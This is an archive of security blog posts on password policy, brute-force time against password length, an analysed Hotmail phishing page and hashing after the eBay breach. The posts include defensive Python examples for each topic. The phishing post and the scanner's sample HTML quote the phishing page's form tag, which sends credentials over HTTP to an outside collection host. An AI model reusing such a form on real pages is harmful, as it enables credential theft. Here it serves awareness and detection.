Tag Archives: password

CIS Password Policy Guide – A Quantum Leap in User Experience and Security

8 August 2020

The Password Policy Guide(1) published by the Center for Internet Security (CIS) on 29 July 2020 drowned in the omnipresent noise of vulnerabilities and data breaches.

Wrongly, because the CIS guide puts an end to the commonly accepted practice of complex passwords, namely those that are easy to crack but hard to remember.

The guide recommends:

  • The use of passphrases, because users will then select longer, more secure passwords.
  • Event-based password expiration, with an annual change as a backstop.
  • The use of password managers.

For password managers in particular, the guide recommends:

“Use of these should be actively encouraged for use with password-only authentication systems (especially if the user needs to manage access to multiple of these systems)”.

And, where “feasible, using MFA instead of just a master password to gain access to the Password Manager is preferred”.

YubiKey for MFA and KeePassXC

For some months now I have mainly been working on a Linux desktop. Unfortunately, I often have to switch to Windows because of Word and PowerPoint. So I use KeePassXC to allow easy switching between the operating systems.

My cloud account is secured with a YubiKey, and so is my KeePassXC database. This works fine on Windows and Linux.

To boost user experience and password security, please give the CIS Password Policy Guide the attention it deserves.

Have a great weekend.


  1. White Paper: CIS Password Policy Guide [Internet]. Center for Internet Security. [cited 2020 Aug 8]. Available from: https://www.cisecurity.org/white-papers/cis-password-policy-guide/.

It’s all about strong passwords, but what is a strong password?

11 October 2014

In his report ‘Apple security depends on users, hack shows’, Warwick Ashford talks about the latest Apple security issues:

‘However, the effectiveness of the controls Apple has put in place to keep passwords secure ultimately depends on the passwords users choose, said James Lyne, global head of research at Sophos.’

To put it concisely: It’s all about strong passwords.

But what is a strong password?

There is lots of advice on how to build a strong password like ‘#Q7fr%78’. Unfortunately, such passwords are really hard to remember and to type. Some days ago I watched a webinar about WordPress security where a different approach was presented.

It’s all about password length because the number of combinations an attacker has to try in a brute force attack depends essentially on the length of the password:

Number of combinations = [Number of characters] to the power of [length of your password]

That’s just boring math, so let me show what this means with an example:

If you choose a password from lowercase letters ‘a..z’ only, the number of characters is 26. For a four-character password like ‘abcd’ the number of combinations an attacker has to try is

26 to the power of 4 = 26 x 26 x 26 x 26 = 456976.

Cracking that takes about 0.2 milliseconds on a desktop computer with an Intel i7 processor. Four characters are definitely too short!

For a 12-character password like ‘abcdefghijkl’ the number of combinations an attacker has to try is

26 to the power of 12 = 95428956661682200, and the time to crack is about 1.5 years.

The following table shows the cracking time in relation to the password length:

[Table: Password cracking time vs. length]

The yellow marking shows the one-year-time-to-crack for each character set. The one-year-time-to-crack is the password length at which an attacker with an Intel i7 based computer needs one year to find the combination by brute force. For our plain character set the one-year-time-to-crack is 12.

With the character set ‘a..z A..Z 0..9’ the one-year-time-to-crack is 10. With the complex character set ‘a..z A..Z 0..9 _-%$§&/()#=?’ it is 9.

Even with the complex character set you should use at least 9 characters.

As a result we get: it’s all about the password length! The influence of the character set is negligible. Even with the plain character set one can create hard-to-crack passwords.

I would recommend using at least 14 characters, even with the complex character set, just to be ready for faster CPUs and to anger the NSA!
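
The math above, carried through in code. This is an added example, not part of the original post: it reproduces the post’s formula (combinations = characters to the power of length) for the three character sets discussed, and derives the one-year-time-to-crack for each. The guess rate of 2 billion per second is an assumption calibrated to the post’s own figures (26 to the power of 12 taking about 1.5 years), not a measured i7 benchmark; with it, the one-year lengths come out as 12, 10 and 9, exactly as in the table.

```python
# Added example (not from the post): brute-force search space and time-to-crack,
# following the post's "combinations = characters ** length" reasoning.
# The guess rate is an assumption calibrated to the post's figures
# (26**12 taking about 1.5 years); it is not a measured i7 benchmark.
import string

GUESSES_PER_SECOND = 2.0e9              # assumed single-machine rate, see note above
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# The three character sets discussed in the post.
CHARSETS = {
    "plain": string.ascii_lowercase,                                   # a..z
    "alnum": string.ascii_letters + string.digits,                     # a..z A..Z 0..9
    "complex": string.ascii_letters + string.digits + "_-%$§&/()#=?",  # 74 characters
}


def combinations(charset_size, length):
    """Number of candidates an attacker must try to exhaust the search space."""
    return charset_size ** length


def seconds_to_crack(charset_size, length, rate=GUESSES_PER_SECOND):
    """Worst-case time to try every combination at `rate` guesses per second."""
    return combinations(charset_size, length) / rate


def one_year_length(charset_size, rate=GUESSES_PER_SECOND):
    """Smallest password length whose exhaustive search takes at least one year."""
    length = 1
    while seconds_to_crack(charset_size, length, rate) < SECONDS_PER_YEAR:
        length += 1
    return length


def human_time(seconds):
    """Render a duration in the largest unit that gives a value of at least 1."""
    units = [("years", SECONDS_PER_YEAR), ("days", 86400), ("hours", 3600),
             ("minutes", 60), ("seconds", 1)]
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds * 1e3:.3f} milliseconds"


def crack_table(max_length=16, rate=GUESSES_PER_SECOND):
    """Rows of (length, {charset name: seconds to crack}), like the post's table."""
    return [(length, {name: seconds_to_crack(len(cs), length, rate)
                      for name, cs in CHARSETS.items()})
            for length in range(4, max_length + 1)]


if __name__ == "__main__":
    for name, cs in CHARSETS.items():
        print(f"{name:8s} size={len(cs):3d}  one-year length={one_year_length(len(cs))}")
    for length, times in crack_table():
        cells = "  ".join(f"{name}={human_time(t):>18s}" for name, t in times.items())
        print(f"{length:2d}: {cells}")
```

Raising the assumed rate (GPU rigs, or an attacker with many machines) shifts every row of the table down, which is the post’s reason for adding a margin on top of the one-year length.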

How to build strong passwords?

My passwords are easy to build and remember. Start with 4 randomly selected words, in total more than 14 characters, like

‘Never use the word.’

This password is rated ‘Strong’ by the Microsoft password checker. Never use the first words of your favourite song or something you published on Facebook or elsewhere, because an attacker will do some social engineering and try those results first.

Strong is not enough, so write the first character of each word in capital letters and add a special character or two at both ends:

‘#Never Use The Word._’

This version is rated ‘Best’.

If you are a masochist, hurt yourself and change the first vowel in each word to a number:

‘#N1ver 2he Th3 W4rd._’

Isn’t this an easy to remember password? 😉


I am phished!

11 September 2014

During my vacation I got some well-made phishing mails. Since an iPad is not the best device for analyzing phishing mails, I filed them for further processing at home.

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail, for privacy reasons.

Normally I drop such mails immediately, but sometimes I do some further analysis to keep awareness high.

So I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a fake Outlook login page is displayed:

Outlook Login Phishing Site

Again, it is obvious that this is a fake, even though it is really well made:

  1. The site address is not Outlook.com.
  2. Site access is not secured: HTTP is used instead of HTTPS.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

<form name="f1" action="http://johnbomb.altervista.org/fi.php" method="POST" novalidate …>

For more details, open the ‘Developer Tools’ menu or press F12 and use the Inspect function from the context menu.
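
The three signs listed above can be checked mechanically. The following is an added example, not part of the original post: it parses a login page with Python’s standard HTML parser and reports, for every form that contains a password field, whether the page and the form’s action use HTTPS, whether they point at the expected host, and whether the submit button carries an unexpected label. The sample HTML is constructed around the form tag quoted above; the page URL for the phishing sample is a placeholder, and the expected host is taken from the post’s first point (a real deployment would list all of the brand’s legitimate login hosts).

```python
# Added example (not from the post): scan login-page HTML for the three
# tell-tale signs listed in the post. Only the <form> tag is from the post;
# the rest of the sample HTML and the page URLs are constructed.
from html.parser import HTMLParser
from urllib.parse import urlparse

PHISHING_HTML = """
<html><body>
<form name="f1" action="http://johnbomb.altervista.org/fi.php" method="POST" novalidate>
  <input type="email" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Validate">
</form>
</body></html>
"""

# Constructed counter-example of what a legitimate page would look like.
LEGIT_HTML = """
<form action="https://outlook.com/auth" method="POST">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
"""


class FormScanner(HTMLParser):
    """Collect each form's action, method, number of password inputs and submit labels."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None
        self._in_button = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # bare attributes like novalidate -> ""
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": a.get("method", "GET").upper(),
                          "password_fields": 0, "submit_labels": []}
            self.forms.append(self._form)
        elif self._form is not None and tag == "input":
            kind = a.get("type", "text").lower()
            if kind == "password":
                self._form["password_fields"] += 1
            elif kind == "submit":
                self._form["submit_labels"].append(a.get("value", ""))
        elif self._form is not None and tag == "button":
            self._in_button = True

    def handle_data(self, data):
        if self._in_button and self._form is not None and data.strip():
            self._form["submit_labels"].append(data.strip())

    def handle_endtag(self, tag):
        if tag == "button":
            self._in_button = False
        elif tag == "form":
            self._form = None


def _matches(host, expected_host):
    return host == expected_host or host.endswith("." + expected_host)


def phishing_indicators(page_url, html, expected_host="outlook.com",
                        expected_labels=("Sign in",)):
    """Return the sorted indicator names found for credential forms on the page."""
    scanner = FormScanner()
    scanner.feed(html)
    page = urlparse(page_url)
    page_host = page.hostname or ""
    found = set()
    if page.scheme != "https":
        found.add("page_not_https")
    if not _matches(page_host, expected_host):
        found.add("page_host_mismatch")
    labels = {l.lower() for l in expected_labels}
    for form in scanner.forms:
        if form["password_fields"] == 0:
            continue                              # not a credential form
        action = urlparse(form["action"])
        host = action.hostname or page_host       # relative action posts back to the page
        scheme = action.scheme or page.scheme
        if not _matches(host, expected_host):
            found.add("action_host_mismatch")
        if scheme != "https":
            found.add("credentials_sent_in_clear")
        if form["submit_labels"] and not any(l.strip().lower() in labels
                                             for l in form["submit_labels"]):
            found.add("unexpected_submit_label")
    return sorted(found)


if __name__ == "__main__":
    print(phishing_indicators("http://phishing-site.invalid/outlook/", PHISHING_HTML))
    print(phishing_indicators("https://outlook.com/login", LEGIT_HTML))
```

The action-host check is the one that matters most in practice: a page can be dressed up to look right, but the form still has to deliver the credentials somewhere the attacker controls.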

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!

The eBay data breach – Is hashing of passwords the appropriate response?

10 June 2014

The news about the data theft at eBay has almost electrified me. Not out of fear of losing my private data, since I am not an eBay customer, but because the circumstances under which the theft took place are interesting to me from a professional point of view.

My first thought was: This was an Insider Attack!

The IT departments of large companies do a very good job of operating the servers connected to the internet. I would have been very surprised by an attack through the servers at the company’s perimeter to the internet.

The information published by eBay on 21 May 2014 [1] saved my day:

‘Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network.’

I am not at all surprised that eBay discovered the loss of customer information with a two-month delay. According to the Ponemon Study 2013 [2], the average time to resolve attacks by ‘malicious insiders’ was 65.5 days in 2012 (57.1 days in 2011). That fits well in this case, too.

But I am somewhat puzzled by the discussion in some blogs about whether encryption is the adequate method to protect sensitive and private data from unauthorized access. Hashing is praised as the better method for protecting passwords.

In my opinion this discussion does not go nearly far enough. The loss of e-mail addresses, physical addresses, and dates of birth is to be taken at least as seriously as the loss of passwords, since this information enables, for example, professionally made targeted phishing attacks. And, as we all know, an experienced hacker can attack even a hashed password, in particular if he has enough time behind closed doors. See [3] for amazing details about the cracking of hashed passwords.
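
Why a hashed password is still attackable given time, shown in code. This is an added example and has nothing to do with eBay’s actual systems: it contrasts a plain, unsalted SHA-256 (fast, identical for identical passwords, so guessable offline at enormous rates) with a per-user salted PBKDF2-HMAC-SHA256, whose iteration count is the defender’s tuning knob. The throughput figures printed at the end depend on the machine; the iteration count of 200,000 is an assumption chosen for illustration.

```python
# Added example (not from the post): a fast unsalted hash versus a salted,
# deliberately slow key-derivation function for stored passwords.
import hashlib
import hmac
import os
import time

ITERATIONS = 200_000   # assumed PBKDF2 work factor; raise it as hardware gets faster


def fast_hash(password):
    """Plain SHA-256 of the password: unsalted and cheap, so offline guessing is cheap too."""
    return hashlib.sha256(password.encode()).hexdigest()


def slow_hash(password, salt=None, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest) so both can be stored together."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify(password, salt, digest, iterations=ITERATIONS):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = slow_hash(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


def salt_defeats_precomputation(password, iterations=1_000):
    """Two users with the same password end up with different stored digests."""
    salt_a, digest_a = slow_hash(password, iterations=iterations)
    salt_b, digest_b = slow_hash(password, iterations=iterations)
    return salt_a != salt_b and digest_a != digest_b


def guesses_per_second(hash_fn, seconds=0.5):
    """Rough single-threaded throughput of hash_fn on this machine."""
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        hash_fn(f"candidate{count}")
        count += 1
    return count / seconds


if __name__ == "__main__":
    fast = guesses_per_second(fast_hash)
    slow = guesses_per_second(lambda p: slow_hash(p, b"fixed-salt-for-timing")[1], seconds=2.0)
    print(f"SHA-256: {fast:,.0f} guesses/s; PBKDF2 ({ITERATIONS} iters): {slow:,.1f} guesses/s")
    print(f"slowdown factor for an offline attacker: {fast / slow:,.0f}x")
    print("salt defeats precomputation:", salt_defeats_precomputation("same password"))
```

The slowdown factor is the whole point: it multiplies the attacker’s time behind closed doors, but it does not change the fact that a weak or reused password is found first, which is where the post’s point about awareness and training comes in.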

New technology alone will not necessarily increase overall security, because the root causes of this data breach are more likely a lack of security awareness and training. Therefore, only the classic PPT approach, which includes People, Processes and Technology, will lead to increased overall security.

PPT – People, Processes, Technology